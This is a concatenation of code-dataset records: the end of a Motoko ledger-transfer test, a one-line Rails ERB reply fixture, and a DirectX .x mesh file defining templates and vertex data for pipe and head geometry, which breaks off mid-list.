(#Ok(tip)) { ?tip }; case (#Err(#BadFee { expected_fee })) { Prim.debugPrint("ERROR: bad fee " # debug_show fee # ", expected fee: " # debug_show expected_fee); null }; case (#Err(#InsufficientFunds { balance })) { Prim.debugPrint("ERROR: insufficient funds, balance: " # debug_show balance); null }; case (#Err(#TxTooOld { allowed_window_nanos })) { Prim.debugPrint("ERROR: transaction too old, allowed window: " # debug_show allowed_window_nanos); null }; case (#Err(#TxCreatedInFuture)) { Prim.debugPrint("ERROR: transaction created in future"); null }; case (#Err(#TxDuplicate { duplicate_of })) { Prim.debugPrint("ERROR: transaction is a duplicate of the transaction in block " # debug_show duplicate_of); null }; }; } catch e { Prim.debugPrint(debug_show (Prim.errorCode e, Prim.errorMessage e)); assert iHave.e8s < amount.e8s + fee.e8s; null }; } }
Modelica
5
3cL1p5e7/ic
rs/tests/src/transaction_ledger_correctness.mo
[ "Apache-2.0" ]
<%= reply.content %>
HTML+ERB
3
mdesantis/rails
actionview/test/fixtures/replies/_reply.erb
[ "MIT" ]
xof 0302txt 0064 template Header { <3D82AB43-62DA-11cf-AB39-0020AF71E433> WORD major; WORD minor; DWORD flags; } template Vector { <3D82AB5E-62DA-11cf-AB39-0020AF71E433> FLOAT x; FLOAT y; FLOAT z; } template Coords2d { <F6F23F44-7686-11cf-8F52-0040333594A3> FLOAT u; FLOAT v; } template Matrix4x4 { <F6F23F45-7686-11cf-8F52-0040333594A3> array FLOAT matrix[16]; } template ColorRGBA { <35FF44E0-6C7C-11cf-8F52-0040333594A3> FLOAT red; FLOAT green; FLOAT blue; FLOAT alpha; } template ColorRGB { <D3E16E81-7835-11cf-8F52-0040333594A3> FLOAT red; FLOAT green; FLOAT blue; } template IndexedColor { <1630B820-7842-11cf-8F52-0040333594A3> DWORD index; ColorRGBA indexColor; } template Boolean { <4885AE61-78E8-11cf-8F52-0040333594A3> WORD truefalse; } template Boolean2d { <4885AE63-78E8-11cf-8F52-0040333594A3> Boolean u; Boolean v; } template MaterialWrap { <4885AE60-78E8-11cf-8F52-0040333594A3> Boolean u; Boolean v; } template TextureFilename { <A42790E1-7810-11cf-8F52-0040333594A3> STRING filename; } template Material { <3D82AB4D-62DA-11cf-AB39-0020AF71E433> ColorRGBA faceColor; FLOAT power; ColorRGB specularColor; ColorRGB emissiveColor; [...] } template MeshFace { <3D82AB5F-62DA-11cf-AB39-0020AF71E433> DWORD nFaceVertexIndices; array DWORD faceVertexIndices[nFaceVertexIndices]; } template MeshFaceWraps { <4885AE62-78E8-11cf-8F52-0040333594A3> DWORD nFaceWrapValues; Boolean2d faceWrapValues; } template MeshTextureCoords { <F6F23F40-7686-11cf-8F52-0040333594A3> DWORD nTextureCoords; array Coords2d textureCoords[nTextureCoords]; } template MeshMaterialList { <F6F23F42-7686-11cf-8F52-0040333594A3> DWORD nMaterials; DWORD nFaceIndexes; array DWORD faceIndexes[nFaceIndexes]; [Material] } template MeshNormals { <F6F23F43-7686-11cf-8F52-0040333594A3> DWORD nNormals; array Vector normals[nNormals]; DWORD nFaceNormals; array MeshFace faceNormals[nFaceNormals]; } template MeshVertexColors { <1630B821-7842-11cf-8F52-0040333594A3> DWORD nVertexColors; array IndexedColor vertexColors[nVertexColors]; } template Mesh { <3D82AB44-62DA-11cf-AB39-0020AF71E433> DWORD nVertices; array Vector vertices[nVertices]; DWORD nFaces; array MeshFace faces[nFaces]; [...] } template FrameTransformMatrix { <F6F23F41-7686-11cf-8F52-0040333594A3> Matrix4x4 frameMatrix; } template Frame { <3D82AB46-62DA-11cf-AB39-0020AF71E433> [...] } Header { 1; 0; 1; } Frame _vp2244 { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, -0.000001, 0.000000, 0.000000, 0.926359;; } #FrameTransformMatrix Frame _heads { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh heads { 28; -0.053555;0.472471;0.490503;, -0.224349;0.300441;0.490407;, 0.115631;0.110305;0.490356;, 0.275027;-0.031677;0.490353;, 0.576654;0.312940;0.490345;, 0.648508;0.395032;0.490343;, 0.022844;0.549416;0.490621;, 0.031361;0.539252;-1.321063;, -0.020276;0.487238;-1.321896;, -0.215007;0.291120;-1.321440;, 0.115583;0.110305;-1.321590;, 0.274980;-0.031677;-1.321593;, 0.576609;0.312941;-1.321601;, 0.648460;0.395031;-1.321603;, -1.432218;0.142990;0.490398;, -1.270811;-0.038363;0.490394;, -1.103774;0.110305;0.490389;, -0.755377;0.305375;0.490362;, -0.916775;0.486717;0.490366;, -0.989324;0.568233;0.490368;, -1.669285;0.430500;0.490404;, -1.669331;0.430500;-1.321542;, -1.432264;0.142990;-1.321548;, -1.270859;-0.038363;-1.321552;, -1.103820;0.110305;-1.321557;, -0.755424;0.305375;-1.321584;, -0.916822;0.486717;-1.321580;, -0.989371;0.568233;-1.321578;; 27; 4;7,6,5,13;, 4;21,20,19,27;, 4;26,18,17,25;, 4;27,19,18,26;, 3;24,26,25;, 4;26,24,21,27;, 4;21,24,23,22;, 4;18,14,16,17;, 4;20,14,18,19;, 3;16,14,15;, 4;25,17,16,24;, 4;24,16,15,23;, 4;23,15,14,22;, 4;22,14,20,21;, 4;8,0,6,7;, 4;9,1,0,8;, 3;6,4,5;, 5;2,4,6,0,1;, 3;4,2,3;, 3;12,7,13;, 4;7,12,11,8;, 3;10,8,11;, 3;8,10,9;, 4;13,5,4,12;, 4;12,4,3,11;, 4;11,3,2,10;, 4;10,2,1,9;; MeshMaterialList { 1; 27; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.247059;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _heads Frame _pipes1 { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh pipes1 { 786; -1.257828;0.012080;-0.684640;, -1.257825;0.012080;-0.813677;, -1.257823;0.012080;-0.942713;, -1.375407;0.144197;-0.942716;, -1.375414;0.144197;-0.684643;, -1.406494;0.116535;-0.684644;, -1.288910;-0.015582;-0.684640;, -1.288906;-0.015582;-0.813677;, -1.288902;-0.015582;-0.942714;, -1.406489;0.116535;-0.942717;, -1.257837;0.012080;-0.360604;, -1.257835;0.012080;-0.489640;, -1.257830;0.012080;-0.618678;, -1.375415;0.144197;-0.618681;, -1.375423;0.144197;-0.360607;, -1.406503;0.116535;-0.360608;, -1.288919;-0.015582;-0.360605;, -1.288914;-0.015582;-0.489641;, -1.288911;-0.015582;-0.618679;, -1.406497;0.116535;-0.618682;, -1.257849;0.012080;0.071206;, -1.257845;0.012080;-0.057831;, -1.375430;0.144197;-0.057834;, -1.375437;0.144197;0.199405;, -1.257853;0.012080;0.199408;, -1.288932;-0.015582;0.199407;, -1.288930;-0.015582;0.071205;, -1.288926;-0.015582;-0.057831;, -1.406511;0.116535;-0.057834;, -1.406518;0.116535;0.199404;, -1.325829;0.088488;-0.873874;, -1.299435;0.058835;-0.866303;, -1.278785;0.035631;-0.839806;, -1.269410;0.025096;-0.801484;, -1.273822;0.030052;-0.761607;, -1.290838;0.049170;-0.730859;, -1.315900;0.077329;-0.717478;, -1.342294;0.106983;-0.725050;, -1.362944;0.130186;-0.751547;, -1.372318;0.140721;-0.789869;, -1.367906;0.135766;-0.829745;, -1.350890;0.116646;-0.860495;, -1.507611;-0.022345;-0.847706;, -1.481290;-0.053348;-0.840794;, -1.463305;-0.078664;-0.814165;, -1.458475;-0.091510;-0.774953;, -1.468094;-0.088443;-0.733664;, -1.489585;-0.070285;-0.701364;, -1.517190;-0.041901;-0.686706;, -1.543511;-0.010897;-0.693619;, -1.561495;0.014418;-0.720248;, -1.566324;0.027265;-0.759461;, -1.556706;0.024197;-0.800748;, -1.535215;0.006039;-0.833048;, -1.579984;-0.116155;-0.893222;, -1.550222;-0.142697;-0.884145;, -1.535816;-0.172656;-0.859767;, -1.540632;-0.198002;-0.826621;, -1.563376;-0.211945;-0.793586;, -1.597951;-0.210748;-0.769516;, -1.635098;-0.194734;-0.760860;, -1.664860;-0.168192;-0.769937;, -1.679265;-0.138234;-0.794314;, -1.674450;-0.112887;-0.827460;, -1.651708;-0.098945;-0.860495;, -1.617131;-0.100141;-0.884564;, -1.621588;-0.208339;-1.015723;, -1.590394;-0.231705;-1.002426;, -1.576779;-0.263413;-0.980375;, -1.584396;-0.294968;-0.955476;, -1.611200;-0.317913;-0.934405;, -1.650013;-0.326101;-0.922805;, -1.690434;-0.317339;-0.923786;, -1.721626;-0.293972;-0.937082;, -1.735242;-0.262266;-0.959135;, -1.727626;-0.230711;-0.984032;, -1.700821;-0.207765;-1.005103;, -1.662008;-0.199577;-1.016704;, -1.614134;-0.312365;-1.152936;, -1.583456;-0.328527;-1.130136;, -1.570181;-0.355504;-1.101844;, -1.577867;-0.386066;-1.075639;, -1.604456;-0.412026;-1.058544;, -1.642821;-0.426428;-1.055140;, -1.682685;-0.425412;-1.066338;, -1.713366;-0.409251;-1.089138;, -1.726640;-0.382273;-1.117431;, -1.718953;-0.351711;-1.143636;, -1.692364;-0.325750;-1.160730;, -1.653998;-0.311349;-1.164134;, -1.559723;-0.431738;-1.258544;, -1.534221;-0.436539;-1.225692;, -1.525674;-0.453140;-1.188221;, -1.536372;-0.477095;-1.156171;, -1.563451;-0.501985;-1.138128;, -1.599651;-0.521140;-1.138930;, -1.635274;-0.529429;-1.158359;, -1.660775;-0.524628;-1.191211;, -1.669320;-0.508026;-1.228682;, -1.658621;-0.484071;-1.260733;, -1.631546;-0.459182;-1.278775;, -1.595346;-0.440026;-1.277974;, -1.478530;-0.563682;-1.297296;, -1.462967;-0.552335;-1.259702;, -1.465051;-0.551661;-1.217156;, -1.484223;-0.561844;-1.181062;, -1.515350;-0.580153;-1.161086;, -1.550088;-0.601683;-1.162585;, -1.579131;-0.620664;-1.185155;, -1.594697;-0.632013;-1.222750;, -1.592611;-0.632686;-1.265295;, -1.573437;-0.622504;-1.301390;, -1.542312;-0.604195;-1.321364;, -1.507572;-0.582665;-1.319867;, -1.400766;-0.689051;-1.247835;, -1.394207;-0.663185;-1.215970;, -1.406610;-0.645878;-1.179987;, -1.434650;-0.641767;-1.149531;, -1.470812;-0.651956;-1.132759;, -1.505408;-0.673714;-1.134168;, -1.529172;-0.701209;-1.153381;, -1.535730;-0.727076;-1.185245;, -1.523327;-0.744384;-1.221229;, -1.495289;-0.748493;-1.251686;, -1.459125;-0.738305;-1.268456;, -1.424526;-0.716548;-1.267048;, -1.341584;-0.791745;-1.139136;, -1.339986;-0.757268;-1.116381;, -1.357932;-0.730341;-1.090580;, -1.390611;-0.718179;-1.068647;, -1.429269;-0.724039;-1.056458;, -1.463546;-0.746353;-1.057277;, -1.484261;-0.779139;-1.070889;, -1.485858;-0.813615;-1.093642;, -1.467911;-0.840541;-1.119443;, -1.435232;-0.852704;-1.141378;, -1.396575;-0.846844;-1.153566;, -1.362298;-0.824531;-1.152746;, -1.296049;-0.858999;-0.996907;, -1.297290;-0.820333;-0.983016;, -1.318237;-0.788972;-0.966591;, -1.353278;-0.773321;-0.952037;, -1.393026;-0.777571;-0.943252;, -1.426829;-0.800587;-0.942587;, -1.445629;-0.836198;-0.950226;, -1.444389;-0.874865;-0.964117;, -1.423442;-0.906226;-0.980540;, -1.388398;-0.921877;-0.995095;, -1.348652;-0.917626;-1.003881;, -1.314850;-0.894611;-1.004545;, -1.263789;-0.897229;-0.837641;, -1.266022;-0.857388;-0.828649;, -1.288242;-0.824517;-0.818511;, -1.324497;-0.807428;-0.809942;, -1.365072;-0.810699;-0.805241;, -1.399093;-0.833452;-0.805665;, -1.417450;-0.869593;-0.811104;, -1.415217;-0.909436;-0.820095;, -1.392996;-0.942304;-0.830234;, -1.356742;-0.959394;-0.838801;, -1.316166;-0.956123;-0.843504;, -1.282143;-0.933369;-0.843078;, -1.252972;-0.929451;-0.674056;, -1.255407;-0.889008;-0.668116;, -1.277979;-0.855085;-0.663317;, -1.314644;-0.836776;-0.660949;, -1.355578;-0.838984;-0.661644;, -1.389806;-0.861117;-0.665216;, -1.408167;-0.897246;-0.670708;, -1.405730;-0.937689;-0.676649;, -1.383157;-0.971611;-0.681446;, -1.346492;-0.989921;-0.683816;, -1.305562;-0.987712;-0.683121;, -1.271331;-0.965579;-0.679549;, -1.266656;-0.945655;-0.509614;, -1.268758;-0.904820;-0.507653;, -1.290793;-0.870259;-0.509344;, -1.326854;-0.851234;-0.514234;, -1.367280;-0.852842;-0.521012;, -1.401238;-0.874652;-0.527864;, -1.419628;-0.910820;-0.532951;, -1.417525;-0.951657;-0.534912;, -1.395491;-0.986219;-0.533221;, -1.359430;-1.005243;-0.528331;, -1.319005;-1.003635;-0.521553;, -1.285046;-0.981824;-0.514702;, -1.306636;-0.947837;-0.349353;, -1.308218;-0.906972;-0.349490;, -1.329203;-0.872355;-0.355376;, -1.363976;-0.853260;-0.365435;, -1.403215;-0.854803;-0.376971;, -1.436403;-0.876572;-0.386893;, -1.454655;-0.912732;-0.392544;, -1.453076;-0.953597;-0.392407;, -1.432089;-0.988214;-0.386521;, -1.397318;-1.007310;-0.376462;, -1.358080;-1.005767;-0.364925;, -1.324888;-0.983998;-0.355003;, -1.361228;-0.948206;-0.188315;, -1.362525;-0.907338;-0.189282;, -1.383471;-0.872721;-0.195292;, -1.418451;-0.853627;-0.204733;, -1.458094;-0.855173;-0.215075;, -1.491778;-0.876944;-0.223550;, -1.510474;-0.913109;-0.227885;, -1.509175;-0.953975;-0.226918;, -1.488230;-0.988593;-0.220909;, -1.453251;-1.007687;-0.211468;, -1.413606;-1.006141;-0.201124;, -1.379925;-0.984369;-0.192650;, -1.399831;-0.941522;0.018319;, -1.401046;-0.900672;0.016898;, -1.422412;-0.865979;0.013142;, -1.458207;-0.846746;0.008059;, -1.498839;-0.848121;0.003006;, -1.533421;-0.869736;-0.000659;, -1.552686;-0.905803;-0.001953;, -1.551471;-0.946655;-0.000532;, -1.530105;-0.981345;0.003223;, -1.494311;-1.000580;0.008308;, -1.453680;-0.999204;0.013359;, -1.419098;-0.977588;0.017024;, -1.416834;-0.933717;0.280543;, -1.418097;-0.892841;0.279886;, -1.439624;-0.858077;0.278625;, -1.475650;-0.838736;0.277099;, -1.516521;-0.840002;0.275716;, -1.551282;-0.861534;0.274846;, -1.570623;-0.897565;0.274723;, -1.569359;-0.938440;0.275379;, -1.547832;-0.973206;0.276640;, -1.511807;-0.992546;0.278166;, -1.470937;-0.991281;0.279550;, -1.436174;-0.969747;0.280420;, -1.417996;-0.933633;0.580540;, -1.419263;-0.892757;0.580936;, -1.440798;-0.857991;0.581556;, -1.476832;-0.838651;0.582231;, -1.517710;-0.839916;0.582778;, -1.552476;-0.861448;0.583055;, -1.571818;-0.897479;0.582985;, -1.570551;-0.938354;0.582587;, -1.549016;-0.973120;0.581968;, -1.512981;-0.992461;0.581295;, -1.472106;-0.991196;0.580745;, -1.437337;-0.969664;0.580469;, -1.407681;-0.939858;0.910010;, -1.408930;-0.898993;0.910974;, -1.430435;-0.864245;0.912530;, -1.466437;-0.844923;0.914263;, -1.507285;-0.846206;0.915706;, -1.542035;-0.867748;0.916474;, -1.561380;-0.903778;0.916362;, -1.560130;-0.944643;0.915398;, -1.538624;-0.979390;0.913842;, -1.502622;-0.998712;0.912110;, -1.461773;-0.997429;0.910666;, -1.427023;-0.975888;0.909897;, -1.393971;-0.948619;1.246171;, -1.395247;-0.907737;1.246479;, -1.416745;-0.872994;1.248206;, -1.452706;-0.853698;1.250888;, -1.493497;-0.855017;1.253809;, -1.528183;-0.876602;1.256185;, -1.547470;-0.912665;1.257378;, -1.546196;-0.953547;1.257072;, -1.524696;-0.988291;1.255344;, -1.488734;-1.007588;1.252660;, -1.447944;-1.006267;1.249740;, -1.413260;-0.984683;1.247364;, -1.346285;-0.941394;1.709694;, -1.347643;-0.900526;1.709196;, -1.369149;-0.865782;1.710867;, -1.405039;-0.846476;1.714260;, -1.445694;-0.847775;1.718462;, -1.480224;-0.869336;1.722352;, -1.499376;-0.905380;1.724884;, -1.498017;-0.946248;1.725380;, -1.476513;-0.980990;1.723709;, -1.440623;-1.000299;1.720316;, -1.399966;-0.998998;1.716113;, -1.365437;-0.977437;1.712225;, -1.320374;0.082349;-0.568146;, -1.295527;0.054431;-0.557340;, -1.277472;0.034144;-0.528263;, -1.271044;0.026924;-0.488707;, -1.277970;0.034704;-0.449270;, -1.296392;0.055401;-0.420519;, -1.321372;0.083468;-0.410158;, -1.346218;0.111384;-0.420966;, -1.364275;0.131673;-0.450041;, -1.370699;0.138893;-0.489597;, -1.363774;0.131113;-0.529034;, -1.345353;0.110417;-0.557785;, -1.603441;-0.035859;-0.572290;, -1.584152;-0.070498;-0.561429;, -1.574979;-0.097852;-0.532379;, -1.578384;-0.110590;-0.492924;, -1.593452;-0.105301;-0.453633;, -1.616143;-0.083399;-0.425038;, -1.640382;-0.050754;-0.414799;, -1.659672;-0.016115;-0.425660;, -1.668843;0.011238;-0.454710;, -1.665439;0.023977;-0.494166;, -1.650375;0.018686;-0.533456;, -1.627680;-0.003216;-0.562050;, -1.711450;-0.140007;-0.647732;, -1.688809;-0.171416;-0.634530;, -1.683551;-0.202543;-0.608213;, -1.697086;-0.225051;-0.575835;, -1.725786;-0.232906;-0.546069;, -1.761962;-0.224005;-0.526889;, -1.795920;-0.200734;-0.523440;, -1.818560;-0.169326;-0.536641;, -1.823817;-0.138198;-0.562956;, -1.810283;-0.115691;-0.595336;, -1.781583;-0.107834;-0.625102;, -1.745407;-0.116735;-0.644282;, -1.759988;-0.233514;-0.774301;, -1.735817;-0.261970;-0.757103;, -1.731478;-0.294867;-0.733183;, -1.748137;-0.323394;-0.708948;, -1.781328;-0.339902;-0.690894;, -1.822160;-0.339972;-0.683860;, -1.859692;-0.323584;-0.689727;, -1.883864;-0.295129;-0.706924;, -1.888204;-0.262231;-0.730844;, -1.871545;-0.233705;-0.755079;, -1.838352;-0.217196;-0.773133;, -1.797520;-0.217126;-0.780168;, -1.755500;-0.333315;-0.905586;, -1.731641;-0.354813;-0.879234;, -1.727452;-0.384367;-0.850916;, -1.744058;-0.414062;-0.828220;, -1.777009;-0.435939;-0.817227;, -1.817475;-0.444135;-0.820883;, -1.854614;-0.436457;-0.838207;, -1.878476;-0.414961;-0.864559;, -1.882664;-0.385405;-0.892877;, -1.866059;-0.355712;-0.915574;, -1.833108;-0.333835;-0.926566;, -1.792641;-0.325638;-0.922910;, -1.697996;-0.443171;-1.003414;, -1.680389;-0.452725;-0.966427;, -1.680620;-0.473834;-0.930588;, -1.698632;-0.500842;-0.905499;, -1.729597;-0.526511;-0.897882;, -1.765219;-0.543965;-0.909783;, -1.795952;-0.548526;-0.938007;, -1.813562;-0.538971;-0.974993;, -1.813328;-0.517865;-1.010833;, -1.795317;-0.490856;-1.035922;, -1.764351;-0.465186;-1.043537;, -1.728729;-0.447732;-1.031638;, -1.602313;-0.557668;-1.037752;, -1.597594;-0.551797;-0.996139;, -1.608432;-0.560214;-0.956493;, -1.631924;-0.580666;-0.929439;, -1.661772;-0.607671;-0.922224;, -1.689983;-0.633996;-0.936783;, -1.708992;-0.652583;-0.969214;, -1.713710;-0.658454;-1.010828;, -1.702871;-0.650037;-1.050473;, -1.679381;-0.629585;-1.077528;, -1.649532;-0.602580;-1.084742;, -1.621322;-0.576256;-1.070184;, -1.494755;-0.665246;-0.993764;, -1.502535;-0.646875;-0.957262;, -1.524729;-0.643934;-0.922259;, -1.555392;-0.657213;-0.898139;, -1.586309;-0.683150;-0.891361;, -1.609193;-0.714798;-0.903743;, -1.617916;-0.743677;-0.931966;, -1.610138;-0.762049;-0.968468;, -1.587942;-0.764989;-1.003469;, -1.557278;-0.751712;-1.027592;, -1.526363;-0.725773;-1.034369;, -1.503479;-0.694125;-1.021988;, -1.400282;-0.760574;-0.890259;, -1.415497;-0.734699;-0.861904;, -1.445072;-0.724312;-0.834988;, -1.481078;-0.732198;-0.816721;, -1.513871;-0.756244;-0.811998;, -1.534661;-0.790004;-0.822084;, -1.537881;-0.824437;-0.844278;, -1.522666;-0.850313;-0.872632;, -1.493093;-0.860699;-0.899549;, -1.457083;-0.852813;-0.917815;, -1.424291;-0.828767;-0.922539;, -1.403501;-0.795007;-0.912453;, -1.334409;-0.836423;-0.751060;, -1.353613;-0.805956;-0.731130;, -1.387087;-0.791077;-0.712458;, -1.425865;-0.795774;-0.700046;, -1.459553;-0.818786;-0.697220;, -1.479128;-0.853948;-0.704738;, -1.479344;-0.891837;-0.720583;, -1.460141;-0.922304;-0.740513;, -1.426666;-0.937182;-0.759186;, -1.387889;-0.932485;-0.771598;, -1.354199;-0.909473;-0.774425;, -1.334623;-0.874313;-0.766907;, -1.291865;-0.883460;-0.599722;, -1.313252;-0.850581;-0.587557;, -1.348487;-0.833757;-0.575144;, -1.388129;-0.837498;-0.565807;, -1.421558;-0.860798;-0.562049;, -1.439814;-0.897417;-0.564878;, -1.438007;-0.937543;-0.573533;, -1.416621;-0.970422;-0.585698;, -1.381386;-0.987245;-0.598112;, -1.341745;-0.983506;-0.607448;, -1.308315;-0.960205;-0.611206;, -1.290059;-0.923585;-0.608377;, -1.255725;-0.899648;-0.442412;, -1.278806;-0.866008;-0.437632;, -1.315611;-0.848482;-0.432048;, -1.356273;-0.851764;-0.427159;, -1.389904;-0.874975;-0.424273;, -1.407486;-0.911897;-0.424164;, -1.404309;-0.952636;-0.426861;, -1.381228;-0.986275;-0.431642;, -1.344423;-1.003801;-0.437225;, -1.303758;-1.000520;-0.442114;, -1.270130;-0.977308;-0.445001;, -1.252549;-0.940387;-0.445109;, -1.251902;-0.901550;-0.276228;, -1.275141;-0.867834;-0.278232;, -1.312152;-0.850203;-0.281655;, -1.353018;-0.853385;-0.285585;, -1.386791;-0.876524;-0.288965;, -1.404420;-0.913423;-0.290890;, -1.401181;-0.954192;-0.290846;, -1.377944;-0.987908;-0.288844;, -1.340932;-1.005539;-0.285418;, -1.300066;-1.002358;-0.281489;, -1.266292;-0.979219;-0.278110;, -1.248664;-0.942320;-0.276184;, -1.287438;-0.901787;-0.112451;, -1.309727;-0.868064;-0.118817;, -1.345264;-0.850424;-0.129045;, -1.384522;-0.853595;-0.140392;, -1.416982;-0.876726;-0.149816;, -1.433949;-0.913620;-0.154795;, -1.430874;-0.954392;-0.153993;, -1.408582;-0.988114;-0.147625;, -1.373047;-1.005754;-0.137399;, -1.333789;-1.002583;-0.126052;, -1.301330;-0.979451;-0.116626;, -1.284363;-0.942559;-0.111649;, -1.346131;-0.902238;0.048978;, -1.367355;-0.868507;0.039675;, -1.401319;-0.850855;0.025125;, -1.438922;-0.854012;0.009227;, -1.470090;-0.877133;-0.003756;, -1.486468;-0.914023;-0.010349;, -1.483671;-0.954795;-0.008784;, -1.462447;-0.988528;0.000520;, -1.428485;-1.006179;0.015071;, -1.390882;-1.003022;0.030967;, -1.359715;-0.979900;0.043952;, -1.343335;-0.943011;0.050543;, -1.427261;-0.898561;0.215848;, -1.447662;-0.864868;0.204851;, -1.480837;-0.847251;0.188682;, -1.517902;-0.850433;0.171675;, -1.548920;-0.873561;0.158387;, -1.565581;-0.910438;0.152378;, -1.563424;-0.951182;0.155258;, -1.543025;-0.984876;0.166255;, -1.509848;-1.002492;0.182423;, -1.472786;-0.999309;0.199429;, -1.441765;-0.976182;0.212718;, -1.425103;-0.939306;0.218728;, -1.496545;-0.887547;0.373373;, -1.517605;-0.853748;0.363878;, -1.552374;-0.835878;0.351328;, -1.591533;-0.838727;0.339084;, -1.624590;-0.861531;0.330430;, -1.642687;-0.898179;0.327681;, -1.640977;-0.938854;0.331578;, -1.619916;-0.972652;0.341073;, -1.585147;-0.990521;0.353623;, -1.545990;-0.987672;0.365866;, -1.512931;-0.964868;0.374519;, -1.494835;-0.928220;0.377268;, -1.529263;-0.872552;0.532857;, -1.551335;-0.838287;0.528297;, -1.587629;-0.819719;0.523185;, -1.628419;-0.821821;0.518891;, -1.662775;-0.844029;0.516566;, -1.681491;-0.880395;0.516832;, -1.679551;-0.921171;0.519619;, -1.657478;-0.955436;0.524180;, -1.621184;-0.974003;0.529292;, -1.580395;-0.971901;0.533585;, -1.546041;-0.949693;0.535910;, -1.527323;-0.913328;0.535644;, -1.532367;-0.865320;0.751363;, -1.554517;-0.830881;0.752124;, -1.590906;-0.812092;0.753680;, -1.631785;-0.813988;0.755616;, -1.666197;-0.836061;0.757412;, -1.684928;-0.872395;0.758584;, -1.682952;-0.913256;0.758822;, -1.660803;-0.947696;0.758061;, -1.624415;-0.966485;0.756504;, -1.583537;-0.964589;0.754568;, -1.549122;-0.942518;0.752774;, -1.530395;-0.906182;0.751600;, -1.500764;-0.870287;1.042738;, -1.522616;-0.835894;1.046244;, -1.558553;-0.817176;1.051948;, -1.598951;-0.819147;1.058322;, -1.632980;-0.841279;1.063656;, -1.651527;-0.877643;1.066522;, -1.649616;-0.918495;1.066151;, -1.627765;-0.952886;1.062644;, -1.591827;-0.971606;1.056940;, -1.551430;-0.969635;1.050566;, -1.517401;-0.947501;1.045233;, -1.498855;-0.911138;1.042367;, -1.405665;-0.863932;1.499993;, -1.427404;-0.829532;1.504036;, -1.463042;-0.810795;1.511188;, -1.503029;-0.812738;1.519531;, -1.536649;-0.834844;1.526830;, -1.554897;-0.871188;1.531132;, -1.552880;-0.912031;1.531278;, -1.531140;-0.946432;1.527235;, -1.495503;-0.965170;1.520085;, -1.455516;-0.963226;1.511740;, -1.421896;-0.941120;1.504442;, -1.403649;-0.904777;1.500142;, -1.307623;0.068007;0.013071;, -1.285206;0.042820;0.033669;, -1.272352;0.028375;0.075056;, -1.272500;0.028541;0.126141;, -1.285616;0.043275;0.173238;, -1.308182;0.068630;0.203729;, -1.334152;0.097810;0.209440;, -1.356570;0.122997;0.188843;, -1.369425;0.137443;0.147457;, -1.369275;0.137276;0.096371;, -1.356160;0.122541;0.049272;, -1.333594;0.097187;0.018784;, -1.571255;-0.034434;-0.079687;, -1.561967;-0.071223;-0.064430;, -1.568744;-0.100529;-0.035954;, -1.589771;-0.114505;-0.001888;, -1.619414;-0.109403;0.028642;, -1.649727;-0.086591;0.047454;, -1.672593;-0.052181;0.049506;, -1.681882;-0.015392;0.034251;, -1.675107;0.013916;0.005774;, -1.654080;0.027891;-0.028292;, -1.624437;0.022789;-0.058822;, -1.594121;-0.000024;-0.077633;, -1.689223;-0.148189;-0.285820;, -1.679349;-0.184412;-0.269541;, -1.689396;-0.216872;-0.246779;, -1.716671;-0.236873;-0.223629;, -1.753866;-0.239055;-0.206297;, -1.791014;-0.222831;-0.199428;, -1.818163;-0.192552;-0.204860;, -1.828038;-0.156328;-0.221139;, -1.817991;-0.123867;-0.243903;, -1.790717;-0.103867;-0.267050;, -1.753522;-0.101686;-0.284382;, -1.716373;-0.117909;-0.291252;, -1.741811;-0.249496;-0.459932;, -1.730582;-0.283109;-0.439165;, -1.740593;-0.315499;-0.416282;, -1.769159;-0.337989;-0.397412;, -1.808629;-0.344552;-0.387612;, -1.848425;-0.333430;-0.389508;, -1.877885;-0.307603;-0.402590;, -1.889115;-0.273990;-0.423357;, -1.879105;-0.241600;-0.446241;, -1.850537;-0.219110;-0.465111;, -1.811069;-0.212546;-0.474912;, -1.771271;-0.223669;-0.473016;, -1.737433;-0.346881;-0.589837;, -1.726504;-0.373803;-0.560146;, -1.736625;-0.403695;-0.533928;, -1.765086;-0.428548;-0.518210;, -1.804260;-0.441701;-0.517202;, -1.843650;-0.439631;-0.531172;, -1.872700;-0.422891;-0.556380;, -1.883629;-0.395969;-0.586069;, -1.873508;-0.366078;-0.612287;, -1.845048;-0.341226;-0.628006;, -1.805873;-0.328072;-0.629015;, -1.766483;-0.330142;-0.615044;, -1.684870;-0.446839;-0.666254;, -1.680305;-0.461659;-0.627312;, -1.693630;-0.485459;-0.596437;, -1.721276;-0.511864;-0.581904;, -1.755832;-0.533797;-0.587608;, -1.788041;-0.545383;-0.612017;, -1.809272;-0.543516;-0.648594;, -1.813838;-0.528696;-0.687539;, -1.800512;-0.504896;-0.718411;, -1.772865;-0.478491;-0.732944;, -1.738309;-0.456558;-0.727241;, -1.706101;-0.444972;-0.702831;, -1.600771;-0.540798;-0.681844;, -1.610437;-0.539718;-0.640262;, -1.632542;-0.553708;-0.607760;, -1.661165;-0.579020;-0.593047;, -1.688635;-0.608872;-0.600065;, -1.707589;-0.635264;-0.626931;, -1.712955;-0.651126;-0.666450;, -1.703287;-0.652206;-0.708031;, -1.681182;-0.638216;-0.740533;, -1.652559;-0.612904;-0.755245;, -1.625089;-0.583051;-0.748229;, -1.606134;-0.556659;-0.721362;, -1.503658;-0.623052;-0.614550;, -1.528545;-0.609080;-0.583515;, -1.561803;-0.613624;-0.558743;, -1.594524;-0.635467;-0.546867;, -1.617935;-0.668753;-0.551072;, -1.625767;-0.704567;-0.570232;, -1.615923;-0.733311;-0.599211;, -1.591035;-0.747281;-0.630245;, -1.557777;-0.742738;-0.655018;, -1.525057;-0.720896;-0.666893;, -1.501644;-0.687608;-0.662688;, -1.493811;-0.651795;-0.643529;, 